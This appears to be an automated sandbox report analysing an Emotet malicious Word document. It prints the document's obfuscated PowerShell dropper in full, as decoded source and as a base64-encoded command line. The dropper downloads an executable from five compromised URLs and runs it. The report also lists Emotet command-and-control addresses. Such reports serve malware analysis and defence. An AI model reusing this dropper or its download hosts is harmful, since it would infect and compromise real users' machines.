Analysis

  • max time kernel
    58s
  • max time network
    55s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    18-07-2020 05:00

General

  • Target

    e8f1f437e1fa36a8bccefe4b451b6574d2c70a1c24cd56ea42cc6ab51cee6e60.doc

  • Size

    192KB

  • MD5

    f91ef02234ef7391c9a65486999ae11e

  • SHA1

    9e2ec066f5b172e283edda528781021cc09e8e2a

  • SHA256

    e8f1f437e1fa36a8bccefe4b451b6574d2c70a1c24cd56ea42cc6ab51cee6e60

  • SHA512

    f8edce62eae2e7118cb0eb73537e41d0396e4ff6746a45aa6425728b7e05f3f5c2c2837730966f6b4702e164de8e4a31efc1e0b83c45df3376e57d66c6400ecb

Malware Config

Extracted

Language
ps1
Source
1
$noug='maultoezveukrioxbewxij';[Net.ServicePointManager]::"seCur`iTy`P`ROto`COl" = 'tls12, tls11, tls';$jaothpaoth = '870';$louqu='booyweejnealkeov';$dubkeokpip=$env:userprofile+'\'+$jaothpaoth+'.exe';$toaxnoirfietsounsiqu='xoequnool';$cuathcioy=&('new-ob'+'je'+'ct') net.WEbClIENT;$ceexthauchheif='https://www.20190607.com/wp-admin/ixyjozs/*https://lovely-lollies.com/wp-admin/fgvid/*https://www.angage.com/wp-content/mtincvc/*https://connect-plus.co.uk/aspnet_client/3yey3rr/*http://mapas.hoonicorns.pt/comp3/ly8cmti/'."SpL`it"([char]42);$quihjoufjeeploofmeov='loithmaichjoofnaet';foreach($yeeynoobniokgiohxurzaip in $ceexthauchheif){try{$cuathcioy."DoWN`lO`ADFILe"($yeeynoobniokgiohxurzaip, $dubkeokpip);$raequhuaxliajjeik='mew';If ((.('Ge'+'t-I'+'tem') $dubkeokpip)."Leng`TH" -ge 26887) {([wmiclass]'win32_Process')."cRe`AtE"($dubkeokpip);$siechietchuancoildeechtuach='thoun';break;$kuucpeadfeogdaezseuj='sakniorguzriognuuzcoth'}}catch{}}$heufrookriajtheulcieb='ziaqucoexthiezmuuc'
URLs
exe.dropper

https://www.20190607.com/wp-admin/ixyjozs/

exe.dropper

https://lovely-lollies.com/wp-admin/fgvid/

exe.dropper

https://www.angage.com/wp-content/mtincvc/

exe.dropper

https://connect-plus.co.uk/aspnet_client/3yey3rr/

exe.dropper

http://mapas.hoonicorns.pt/comp3/ly8cmti/

Extracted

Family

emotet

C2

109.117.53.230:443

212.51.142.238:8080

190.160.53.126:80

139.59.60.244:8080

91.211.88.52:7080

190.108.228.62:443

186.208.123.210:443

46.105.131.87:80

173.91.22.41:80

222.214.218.37:4143

31.31.77.83:443

62.75.141.82:80

93.156.165.186:80

93.51.50.171:8080

185.94.252.104:443

78.189.165.52:8080

95.179.229.244:8080

73.11.153.178:8080

203.153.216.189:7080

95.213.236.64:8080

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS
3
Q0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS
4
fkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB
5
-----END PUBLIC KEY-----
6

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blacklisted process makes network request 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e8f1f437e1fa36a8bccefe4b451b6574d2c70a1c24cd56ea42cc6ab51cee6e60.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1400
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABuAG8AdQBnAD0AJwBtAGEAdQBsAHQAbwBlAHoAdgBlAHUAawByAGkAbwB4AGIAZQB3AHgAaQBqACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAcgBgAGkAVAB5AGAAUABgAFIATwB0AG8AYABDAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAGoAYQBvAHQAaABwAGEAbwB0AGgAIAA9ACAAJwA4ADcAMAAnADsAJABsAG8AdQBxAHUAPQAnAGIAbwBvAHkAdwBlAGUAagBuAGUAYQBsAGsAZQBvAHYAJwA7ACQAZAB1AGIAawBlAG8AawBwAGkAcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAagBhAG8AdABoAHAAYQBvAHQAaAArACcALgBlAHgAZQAnADsAJAB0AG8AYQB4AG4AbwBpAHIAZgBpAGUAdABzAG8AdQBuAHMAaQBxAHUAPQAnAHgAbwBlAHEAdQBuAG8AbwBsACcAOwAkAGMAdQBhAHQAaABjAGkAbwB5AD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABuAGUAdAAuAFcARQBiAEMAbABJAEUATgBUADsAJABjAGUAZQB4AHQAaABhAHUAYwBoAGgAZQBpAGYAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuADIAMAAxADkAMAA2ADAANwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AaQB4AHkAagBvAHoAcwAvACoAaAB0AHQAcABzADoALwAvAGwAbwB2AGUAbAB5AC0AbABvAGwAbABpAGUAcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZgBnAHYAaQBkAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBhAG4AZwBhAGcAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG0AdABpAG4AYwB2AGMALwAqAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0AC0AcABsAHUAcwAuAGMAbwAuAHUAawAvAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQALwAzAHkAZQB5ADMAcgByAC8AKgBoAHQAdABwADoALwAvAG0AYQBwAGEAcwAuAGgAbwBvAG4AaQBjAG8AcgBuAHMALgBwAHQALwBjAG8AbQBwADMALwBsAHkAOABjAG0AdABpAC8AJwAuACIAUwBwAEwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABxAHUAaQBoAGoAbwB1AGYAagBlAGUAcABsAG8AbwBmAG0AZQBvAHYAPQAnAGwAbwBpAHQAaABtAGEAaQBjAGgAagBvAG8AZgBuAGEAZQB0ACcAOwBmAG8AcgBlAGEAYwBoACgAJAB5AGUAZQB5AG4AbwBvAGIAbgBpAG8AawBnAGkAbwBoAHgAdQByAHoAYQBpAHAAIABpAG4AIAAkAGMAZQBlAHgAdABoAGEAdQBjAGgAaABlAGkAZgApAHsAdAByAHkAewAkAGMAdQBhAHQAaABjAGkAbwB5AC4AIgBEAG8AVwBOAGAAbABPAGAAQQBEAEYASQBMAGUAIgAoACQAeQBlAGUAeQBuAG8AbwBiAG4AaQBvAGsAZwBpAG8AaAB4AHUAcgB6AGEAaQBwACwAIAAkAGQAdQBiAGsAZQBvAGsAcABpAHAAKQA7ACQAcgBhAGUAcQB1AGgAdQBhAHgAbABpAGEAagBqAGUAaQBrAD0AJwBtAGUAdwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAGQAdQBiAGsAZQBvAGsAcABpAHAAKQAuACIATABlAG4AZwBgAFQASAAiACAALQBnAGUAIAAyADYAOAA4ADcAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAUgBlAGAAQQB0AEUAIgAoACQAZAB1AGIAawBlAG8AawBwAGkAcAApADsAJABzAGkAZQBjAGgAaQBlAHQAYwBoAHUAYQBuAGMAbwBpAGwAZABlAGUAYwBoAHQAdQBhAGMAaAA9ACcAdABoAG8AdQBuACcAOwBiAHIAZQBhAGsAOwAkAGsAdQB1AGMAcABlAGEAZABmAGUAbwBnAGQAYQBlAHoAcwBlAHUAagA9ACcAcwBhAGsAbgBpAG8AcgBnAHUAegByAGkAbwBnAG4AdQB1AHoAYwBvAHQAaAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABoAGUAdQBmAHIAbwBvAGsAcgBpAGEAagB0AGgAZQB1AGwAYwBpAGUAYgA9ACcAegBpAGEAcQB1AGMAbwBlAHgAdABoAGkAZQB6AG0AdQB1AGMAJwA=
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:1340
  • C:\Users\Admin\870.exe
    C:\Users\Admin\870.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    PID:580
    • C:\Windows\SysWOW64\uexfat\btpanui.exe
      "C:\Windows\SysWOW64\uexfat\btpanui.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      PID:1884

Network

  • flag-unknown
    DNS
    www.20190607.com
    Remote address:
    8.8.8.8:53
    Request
    www.20190607.com
    IN A
    Response
    www.20190607.com
    IN A
    129.226.70.136
  • flag-unknown
    GET
    https://www.20190607.com/wp-admin/ixyjozs/
    powersheLL.exe
    Remote address:
    129.226.70.136:443
    Request
    GET /wp-admin/ixyjozs/ HTTP/1.1
    Host: www.20190607.com
    Connection: Keep-Alive
  • flag-unknown
    DNS
    apps.identrust.com
    Remote address:
    8.8.8.8:53
    Request
    apps.identrust.com
    IN A
    Response
    apps.identrust.com
    IN CNAME
    apps.digsigtrust.com
    apps.digsigtrust.com
    IN A
    192.35.177.64
  • flag-unknown
    GET
    http://apps.identrust.com/roots/dstrootcax3.p7c
    powersheLL.exe
    Remote address:
    192.35.177.64:80
    Request
    GET /roots/dstrootcax3.p7c HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: apps.identrust.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jul 2020 21:42:00 GMT
    Server: Apache
    X-XSS-Protection: 1; mode=block
    Strict-Transport-Security: max-age=15768000
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Content-Security-Policy: default-src 'self' *.identrust.com
    Cache-control: max-age=86400
    Last-Modified: Thu, 13 Feb 2020 15:25:43 GMT
    ETag: "37d-59e76b3c64bc0"
    Accept-Ranges: bytes
    Content-Length: 893
    X-Content-Type-Options: nosniff
    X-Frame-Options: sameorigin
    Keep-Alive: timeout=5, max=100
    Content-Type: application/pkcs7-mime
  • flag-unknown
    DNS
    www.download.windowsupdate.com
    Remote address:
    8.8.8.8:53
    Request
    www.download.windowsupdate.com
    IN A
    Response
    www.download.windowsupdate.com
    IN CNAME
    wu-fg-shim.trafficmanager.net
    wu-fg-shim.trafficmanager.net
    IN CNAME
    2-01-3cf7-0009.cdx.cedexis.net
    2-01-3cf7-0009.cdx.cedexis.net
    IN CNAME
    cds.d2s7q6s2.hwcdn.net
    cds.d2s7q6s2.hwcdn.net
    IN A
    205.185.216.42
    cds.d2s7q6s2.hwcdn.net
    IN A
    205.185.216.10
  • flag-unknown
    GET
    http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    powersheLL.exe
    Remote address:
    205.185.216.42:80
    Request
    GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
    Cache-Control: max-age = 3600
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Tue, 21 Apr 2020 00:50:26 GMT
    If-None-Match: "03582d87617d61:0"
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: www.download.windowsupdate.com
    Response
    HTTP/1.1 200 OK
    Date: Sat, 18 Jul 2020 05:01:19 GMT
    Connection: Keep-Alive
    Cache-Control: public, max-age=3600
    Content-Length: 58367
    Content-Type: application/vnd.ms-cab-compressed
    Last-Modified: Sat, 13 Jun 2020 20:53:32 GMT
    Accept-Ranges: bytes
    ETag: "06e9cb2c441d61:0"
    X-HW: 1595048479.dop007.am5.t,1595048479.cds131.am5.c
    X-CCC: NL
    X-CID: 9
  • 129.226.70.136:443
    https://www.20190607.com/wp-admin/ixyjozs/
    tls, http
    powersheLL.exe
    6.4kB
    292.6kB
    125
    204

    HTTP Request

    GET https://www.20190607.com/wp-admin/ixyjozs/
  • 192.35.177.64:80
    http://apps.identrust.com/roots/dstrootcax3.p7c
    http
    powersheLL.exe
    369 B
    1.6kB
    5
    3

    HTTP Request

    GET http://apps.identrust.com/roots/dstrootcax3.p7c

    HTTP Response

    200
  • 205.185.216.42:80
    http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    http
    powersheLL.exe
    1.5kB
    60.5kB
    26
    44

    HTTP Request

    GET http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab

    HTTP Response

    200
  • 109.117.53.230:443
    btpanui.exe
    152 B
    3
  • 10.7.0.255:137
    netbios-ns
    624 B
    8
  • 224.0.0.252:5355
    100 B
    2
  • 8.8.8.8:53
    www.20190607.com
    dns
    62 B
    78 B
    1
    1

    DNS Request

    www.20190607.com

    DNS Response

    129.226.70.136

  • 8.8.8.8:53
    apps.identrust.com
    dns
    64 B
    111 B
    1
    1

    DNS Request

    apps.identrust.com

    DNS Response

    192.35.177.64

  • 8.8.8.8:53
    www.download.windowsupdate.com
    dns
    76 B
    225 B
    1
    1

    DNS Request

    www.download.windowsupdate.com

    DNS Response

    205.185.216.42
    205.185.216.10

  • 239.255.255.250:1900
    966 B
    6
  • 239.255.255.250:1900
  • 224.0.0.252:5355
    100 B
    2

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/580-9-0x0000000000260000-0x000000000026C000-memory.dmp

    Filesize

    48KB

  • memory/1400-2-0x0000000008B60000-0x0000000008B64000-memory.dmp

    Filesize

    16KB

  • memory/1400-4-0x000000000B2D0000-0x000000000B2D4000-memory.dmp

    Filesize

    16KB

  • memory/1400-5-0x000000000C350000-0x000000000C354000-memory.dmp

    Filesize

    16KB

  • memory/1884-12-0x00000000003B0000-0x00000000003BC000-memory.dmp

    Filesize

    48KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.